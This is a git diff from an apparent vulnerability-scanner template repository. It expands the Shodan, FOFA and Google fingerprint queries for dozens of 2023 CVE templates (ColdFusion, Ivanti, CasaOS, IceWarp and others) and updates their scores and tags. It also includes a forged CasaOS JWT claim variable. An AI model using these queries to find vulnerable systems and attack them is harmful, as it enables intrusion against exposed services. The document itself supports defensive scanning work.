cve,cve2023,sqli,bloofox,authenticated http: diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index ddcf01b94c..87d9aa7d64 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -23,7 +23,9 @@ info: max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve,cve2023,sqli,bloofox,authenticated http: diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index 0afac821d8..439a14a16c 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -23,7 +23,9 @@ info: max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve,cve2023,sqli,bloofox,authenticated http: diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index ad157cacb0..506327665e 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -23,7 +23,9 @@ info: max-request: 2 vendor: bloofox product: bloofoxcms - fofa-query: "Powered by bloofoxCMS" + fofa-query: + - "Powered by bloofoxCMS" + - powered by bloofoxcms tags: cve,cve2023,sqli,bloofox,authenticated http: diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index facebf75bc..c23a6baed8 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: hestiacp product: control_panel - shodan-query: http.favicon.hash:-476299640 - fofa-query: title="hestia control panel" + shodan-query: + - http.favicon.hash:-476299640 + - http.title:"hestia control panel" + fofa-query: + - title="hestia control panel" + - icon_hash=-476299640 google-query: intitle:"hestia control panel" tags: cve2023,cve,huntr,hestiacp,xss,intrusive diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index ad5547cf04..ebe0371f12 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: traggo product: traggo - shodan-query: html:"traggo" + shodan-query: + - html:"traggo" + - http.html:"traggo" fofa-query: body="traggo" tags: cve2023,cve,traggo,lfi,server diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index 931c9a0825..f0520bc1e2 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -29,7 +29,10 @@ info: max-request: 1 vendor: chamilo product: chamilo - shodan-query: http.component:"Chamilo" + shodan-query: + - http.component:"Chamilo" + - http.component:"chamilo" + - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve,cve2023,packetstorm,chamilo http: diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml index 946d4d2e02..81c4b9be4c 100644 --- a/http/cves/2023/CVE-2023-34993.yaml +++ b/http/cves/2023/CVE-2023-34993.yaml @@ -28,8 +28,13 @@ info: max-request: 1 vendor: fortinet product: fortiwlm - shodan-query: http.title:"FortiWLM" - fofa-query: body="fortiwlm" + shodan-query: + - http.title:"FortiWLM" + - http.html:"fortiwlm" + - http.title:"fortiwlm" + fofa-query: + - body="fortiwlm" + - title="fortiwlm" google-query: intitle:"fortiwlm" tags: cve,cve2023,fortinet,fortiwlm,rce,unauth variables: diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 43ab14d11a..3b6d003cc9 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: ivanti product: endpoint_manager_mobile - shodan-query: http.favicon.hash:362091310 + shodan-query: + - http.favicon.hash:362091310 + - http.favicon.hash:"362091310" fofa-query: icon_hash="362091310" tags: cve,cve2023,kev,ivanti,mobileiron,epmm diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 6b6b844a10..fb9b0090bc 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: ivanti product: endpoint_manager_mobile - shodan-query: http.favicon.hash:362091310 + shodan-query: + - http.favicon.hash:362091310 + - http.favicon.hash:"362091310" fofa-query: icon_hash="362091310" tags: cve2023,cve,ivanti,mobileiron,epmm,kev diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml index 7d75702994..43b1073e01 100644 --- a/http/cves/2023/CVE-2023-35158.yaml +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: xwiki product: xwiki - shodan-query: "XWiki" + shodan-query: + - "XWiki" + - xwiki + - http.html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve,cve2023,xwiki,xss diff --git a/http/cves/2023/CVE-2023-35162.yaml b/http/cves/2023/CVE-2023-35162.yaml index efca725eec..6002a1f4c2 100644 --- a/http/cves/2023/CVE-2023-35162.yaml +++ b/http/cves/2023/CVE-2023-35162.yaml @@ -19,14 +19,18 @@ info: cvss-score: 6.1 cve-id: CVE-2023-35162 cwe-id: CWE-79 - epss-score: 0.00127 - epss-percentile: 0.46778 + epss-score: 0.00129 + epss-percentile: 0.47675 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: xwiki product: xwiki - shodan-query: "XWiki" - fofa-query: body="data-xwiki-reference" + shodan-query: + - XWiki + - xwiki + - http.html:"data-xwiki-reference" + fofa-query: "body=\"data-xwiki-reference\"" tags: cve,cve2023,xwiki,xss http: diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index 6d1c1f40ad..150d18603f 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -24,7 +24,9 @@ info: max-request: 1 vendor: sitecore product: experience_commerce - shodan-query: title:"Sitecore" + shodan-query: + - title:"Sitecore" + - http.title:"sitecore" fofa-query: title="sitecore" google-query: intitle:"sitecore" tags: cve2023,cve,sitecore,rce diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index 959d70c650..d9db823581 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -32,7 +32,9 @@ info: max-request: 1 vendor: lightdash product: lightdash - shodan-query: title:"Lightdash" + shodan-query: + - title:"Lightdash" + - http.title:"lightdash" fofa-query: title="lightdash" google-query: intitle:"lightdash" tags: cve,cve2023,lightdash,lfi diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index 3f2061da50..3d7ef28e05 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -29,8 +29,13 @@ info: max-request: 5 vendor: mgt-commerce product: cloudpanel - shodan-query: title:"Cloudpanel" - fofa-query: icon_hash="151132309" + shodan-query: + - title:"Cloudpanel" + - http.title:"cloudpanel" + - http.favicon.hash:"151132309" + fofa-query: + - icon_hash="151132309" + - title="cloudpanel" google-query: intitle:"cloudpanel" tags: cve2023,cve,cloudpanel,rce,intrusive,mgt-commerce,fileupload variables: diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index 91203fae80..f211cf022d 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: intelbras product: sg_2404_mr_firmware - shodan-query: title:"Intelbras" + shodan-query: + - title:"Intelbras" + - http.title:"intelbras" fofa-query: title="intelbras" google-query: intitle:"intelbras" tags: cve2023,cve,intelbras,switch,exposure diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index 22ae0683f6..62893615c7 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -23,11 +23,13 @@ info: cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: webkul product: qloapps - fofa-query: title="QloApps" - tags: cve,cve2023,qloapps,sqli + fofa-query: + - "title=\"QloApps\"" + - title="qloapps" + tags: cve,cve2023,qloapps,sqli,webkul flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml index 1e306b33f3..fea1904d83 100644 --- a/http/cves/2023/CVE-2023-36347.yaml +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -19,6 +19,7 @@ info: epss-percentile: 0.86929 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: + max-request: 2 vendor: codekop product: codekop tags: cve,cve2023,codekop,pos,auth-bypass diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index bd8415c11f..01fe648ce7 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: juniper product: junos - shodan-query: title:"Juniper Web Device Manager" + shodan-query: + - title:"Juniper Web Device Manager" + - http.title:"juniper web device manager" fofa-query: title="juniper web device manager" google-query: intitle:"juniper web device manager" tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 9181d15f53..22dbe5e717 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: icewhale product: casaos - shodan-query: http.html:"/CasaOS-UI/public/index.html" - fofa-query: body="/CasaOS-UI/public/index.html" + shodan-query: + - http.html:"/CasaOS-UI/public/index.html" + - http.html:"/casaos-ui/public/index.html" + fofa-query: + - body="/CasaOS-UI/public/index.html" + - body="/casaos-ui/public/index.html" tags: cve,cve2023,oss,casaos,jwt,icewhale http: diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index edea449c5d..9564b74d53 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -25,8 +25,12 @@ info: max-request: 1 vendor: icewhale product: casaos - shodan-query: http.html:"/CasaOS-UI/public/index.html" - fofa-query: body="/CasaOS-UI/public/index.html" + shodan-query: + - http.html:"/CasaOS-UI/public/index.html" + - http.html:"/casaos-ui/public/index.html" + fofa-query: + - body="/CasaOS-UI/public/index.html" + - body="/casaos-ui/public/index.html" tags: cve2023,cve,oss,casaos,jwt,icewhale variables: jwt_data: '{"iss":"casaos","exp":1790210322,"nbf":1790199522,"iat":1790199522}' diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index 80fa48f14c..c0d47bcbfb 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -30,7 +30,9 @@ info: vendor: piwigo product: piwigo shodan-query: http.favicon.hash:540706145 - fofa-query: icon_hash=540706145 + fofa-query: + - icon_hash=540706145 + - title="piwigo" google-query: powered by piwigo tags: cve2023,cve,piwigo,sqli,authenticated diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index edb08ddfc2..04c6803e26 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -27,7 +27,10 @@ info: max-request: 2 vendor: xwiki product: xwiki - shodan-query: html:"data-xwiki-reference" + shodan-query: + - html:"data-xwiki-reference" + - xwiki + - http.html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve2023,cve,xwiki,rce diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index 9f3bafac24..bef31bec2a 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: zimbra product: zimbra - shodan-query: http.favicon.hash:475145467 + shodan-query: + - http.favicon.hash:475145467 + - http.favicon.hash:"475145467" fofa-query: icon_hash="475145467" tags: cve2023,cve,zimbra,xss,authenticated,kev diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 829857fc0d..20b9eb486b 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -29,7 +29,9 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" tags: cve2023,cve,mflow,lfi,huntr,lfprojects diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index 6d11af6d44..3b716b7607 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -25,7 +25,9 @@ info: max-request: 2 vendor: nextgen product: mirth_connect - shodan-query: title:"mirth connect administrator" + shodan-query: + - title:"mirth connect administrator" + - http.title:"mirth connect administrator" fofa-query: title="mirth connect administrator" google-query: intitle:"mirth connect administrator" tags: packetstorm,cve2023,cve,nextgen,rce diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index 3187e4b027..b695c496a7 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -25,8 +25,12 @@ info: max-request: 2 vendor: icewarp product: icewarp - shodan-query: http.favicon.hash:2144485375 - fofa-query: title="icewarp" + shodan-query: + - http.favicon.hash:2144485375 + - http.title:"icewarp" + fofa-query: + - title="icewarp" + - icon_hash=2144485375 google-query: intitle:"icewarp" tags: cve,cve2023,icearp,icewarp,xss diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 8782959d43..d116fccdef 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: ivanti product: mobileiron_sentry - shodan-query: 'html:"Note: Requires a local Sentry administrative user"' + shodan-query: + - 'html:"Note: Requires a local Sentry administrative user"' + - 'http.html:"note: requires a local sentry administrative user"' fofa-query: 'body="note: requires a local sentry administrative user"' tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast variables: diff --git a/http/cves/2023/CVE-2023-38203.yaml b/http/cves/2023/CVE-2023-38203.yaml index a1a7d66ca9..0bc00ce249 100644 --- a/http/cves/2023/CVE-2023-38203.yaml +++ b/http/cves/2023/CVE-2023-38203.yaml @@ -26,8 +26,15 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev variables: diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index a18c54bbb8..100cf46124 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -28,8 +28,15 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index 949dfa0687..f8b24740bd 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -27,9 +27,13 @@ info: max-request: 2 vendor: dahuasecurity product: smart_parking_management - shodan-query: html:"/WPMS/asset" + shodan-query: + - html:"/WPMS/asset" + - http.html:"/wpms/asset" fofa-query: body="/wpms/asset" - zoomeye-query: /WPMS/asset + zoomeye-query: + - /WPMS/asset + - /wpms/asset tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity variables: random_str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index aea850fd7e..c5dfcba420 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: fujitsu product: ip-he950e_firmware - shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133' + shodan-query: + - '"Server: thttpd/2.25b 29dec2003" content-length:1133' + - '"server: thttpd/2.25b 29dec2003" content-length:1133' max-req: 1 tags: cve2023,cve,fujitsu,ip-series diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml index 0b8ad635ce..d5a56fc2fa 100644 --- a/http/cves/2023/CVE-2023-3844.yaml +++ b/http/cves/2023/CVE-2023-3844.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3844 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 09c0af296a..fcf37f3846 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: copyparty_project product: copyparty - shodan-query: title:"copyparty" + shodan-query: + - title:"copyparty" + - http.title:"copyparty" fofa-query: title="copyparty" google-query: intitle:"copyparty" tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 7a937c1c6d..01ff2422b2 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -29,8 +29,13 @@ info: max-request: 2 vendor: metabase product: metabase - shodan-query: http.title:"Metabase" - fofa-query: app="Metabase" + shodan-query: + - http.title:"Metabase" + - http.title:"metabase" + fofa-query: + - app="Metabase" + - title="metabase" + - app="metabase" google-query: intitle:"metabase" tags: cve2023,cve,metabase,oss,rce variables: diff --git a/http/cves/2023/CVE-2023-38964.yaml b/http/cves/2023/CVE-2023-38964.yaml index 6fb0560f37..c6f181dc4e 100644 --- a/http/cves/2023/CVE-2023-38964.yaml +++ b/http/cves/2023/CVE-2023-38964.yaml @@ -27,7 +27,9 @@ info: vendor: creativeitem product: academy_lms shodan-query: http.html:"academy lms" - fofa-query: body="Academy LMS" + fofa-query: + - body="Academy LMS" + - body="academy lms" tags: cve2023,cve,academylms,xss,creativeitem http: diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml index 04a9e3c513..defbe64808 100644 --- a/http/cves/2023/CVE-2023-39002.yaml +++ b/http/cves/2023/CVE-2023-39002.yaml @@ -22,7 +22,9 @@ info: max-request: 3 vendor: opnsense product: opnsense - shodan-query: title:"OPNsense" + shodan-query: + - title:"OPNsense" + - http.title:"opnsense" fofa-query: title="opnsense" google-query: intitle:"opnsense" tags: cve2023,cve,opnsense,xss,authenticated,rce diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index 87850f6e68..1b938916dd 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -29,8 +29,10 @@ info: max-request: 1 vendor: microsoft product: windows - shodan-query: title:"FileMage" - tags: cve2023,cve,packetstorm,lfi,filemage + shodan-query: + - title:"FileMage" + - cpe:"cpe:2.3:o:microsoft:windows" + tags: cve2023,cve,packetstorm,lfi,filemage,microsoft http: - method: GET diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index dfaa8f2b83..886fec2405 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -24,7 +24,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfr diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index 4695da7659..0ab820a891 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -24,7 +24,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfi diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index 84919e4c5f..214d40a6dc 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -24,7 +24,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfr diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index 962ddcd133..7780e0ce72 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: ziahamza product: webui-aria2 - shodan-query: title:"Aria2 WebUI" + shodan-query: + - title:"Aria2 WebUI" + - http.title:"aria2 webui" fofa-query: title="aria2 webui" google-query: intitle:"aria2 webui" tags: cve2023,cve,lfi,unauth,aria2,webui,ziahamza diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index 67e334eca5..99f44d3e25 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -28,8 +28,14 @@ info: max-request: 1 vendor: papercut product: papercut_mf - shodan-query: html:"content=\"PaperCut\"" - fofa-query: body="papercut" + shodan-query: + - html:"content=\"PaperCut\"" + - http.html:"papercut" + - http.html:"content=\"papercut\"" + - cpe:"cpe:2.3:a:papercut:papercut_mf" + fofa-query: + - body="papercut" + - body="content=\"papercut\"" tags: cve2023,cve,lfi,papercut http: diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 182469a15f..b5bc7e7301 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -27,9 +27,18 @@ info: max-request: 1 vendor: cacti product: cacti - shodan-query: title:"Login to Cacti" - fofa-query: icon_hash="-1797138069" - google-query: intitle:"cacti" + shodan-query: + - title:"Login to Cacti" + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"cacti" + - intitle:"login to cacti" tags: cve2023,cve,cacti,sqli http: diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index 93632ed6a7..fc13a1cbc9 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: icewarp product: webclient - shodan-query: title:"icewarp" + shodan-query: + - title:"icewarp" + - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" tags: cve2023,cve,xss,icewarp diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index 58f1e953e7..bd637c4b08 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -25,8 +25,13 @@ info: max-request: 1 vendor: icewarp product: icewarp - shodan-query: title:"icewarp" - fofa-query: title="icewarp" + shodan-query: + - title:"icewarp" + - http.favicon.hash:2144485375 + - http.title:"icewarp" + fofa-query: + - title="icewarp" + - icon_hash=2144485375 google-query: intitle:"icewarp" tags: cve,cve2023,icewarp,xss diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index 4cb540787a..d0a46833b4 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -26,7 +26,9 @@ info: vendor: fieldthemes product: fieldpopupnewsletter framework: prestashop - shodan-query: html:"fieldpopupnewsletter" + shodan-query: + - html:"fieldpopupnewsletter" + - http.html:"fieldpopupnewsletter" fofa-query: body="fieldpopupnewsletter" tags: cve2023,cve,prestashop,xss,fieldthemes diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index 51b127efc6..0504ff9dc0 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -26,7 +26,9 @@ info: vendor: simpleimportproduct_project product: simpleimportproduct framework: prestashop - shodan-query: http.component:"PrestaShop" + shodan-query: + - http.component:"PrestaShop" + - http.component:"prestashop" tags: cve2023,cve,prestashop,phpinfo,disclosure,simpleimportproduct_project http: diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml index 1e99397e05..f6da835bb6 100644 --- a/http/cves/2023/CVE-2023-39700.yaml +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -24,9 +24,18 @@ info: max-request: 1 vendor: icewarp product: mail_server - shodan-query: http.title:"IceWarp Server Administration" - fofa-query: title="icewarp server administration" - google-query: intitle:"icewarp server administration" + shodan-query: + - http.title:"IceWarp Server Administration" + - http.title:"icewarp server administration" + - http.title:"icewarp" + - cpe:"cpe:2.3:a:icewarp:mail_server" + fofa-query: + - title="icewarp server administration" + - title="icewarp" + google-query: + - intitle:"icewarp server administration" + - intitle:"icewarp" + - powered by icewarp 10.4.4 tags: cve,cve2023,icewarp,xss,unauth http: diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index e4204363ec..65907be765 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -23,7 +23,9 @@ info: max-request: 1 vendor: icewarp product: deep_castle_g2 - shodan-query: title:"IceWarp" + shodan-query: + - title:"IceWarp" + - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" tags: cve2023,cve,icewarp,redirect diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index 30dc5b1d7d..80c04eaec1 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: phpjabbers product: shuttle_booking_software - shodan-query: html:"PHP Jabbers.com" + shodan-query: + - html:"PHP Jabbers.com" + - http.html:"php jabbers.com" fofa-query: body="php jabbers.com" tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index aafc07dd22..a5a9fe71b8 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: phpjabbers product: taxi_booking_script - shodan-query: html:"PHP Jabbers.com" + shodan-query: + - html:"PHP Jabbers.com" + - http.html:"php jabbers.com" fofa-query: body="php jabbers.com" tags: cve,cve2023,packetstorm,xss,phpjabbers diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml index e4930430c5..e43edf1e32 100644 --- a/http/cves/2023/CVE-2023-41265.yaml +++ b/http/cves/2023/CVE-2023-41265.yaml @@ -25,8 +25,16 @@ info: vendor: qlik product: qlik_sense framework: windows - shodan-query: html:"Qlik" - fofa-query: app="qlik-sense" + shodan-query: + - html:"Qlik" + - http.favicon.hash:-74348711 + - http.html:"qlik" + - http.title:"qlik-sense" + fofa-query: + - app="qlik-sense" + - title="qlik-sense" + - icon_hash=-74348711 + - body="qlik" google-query: 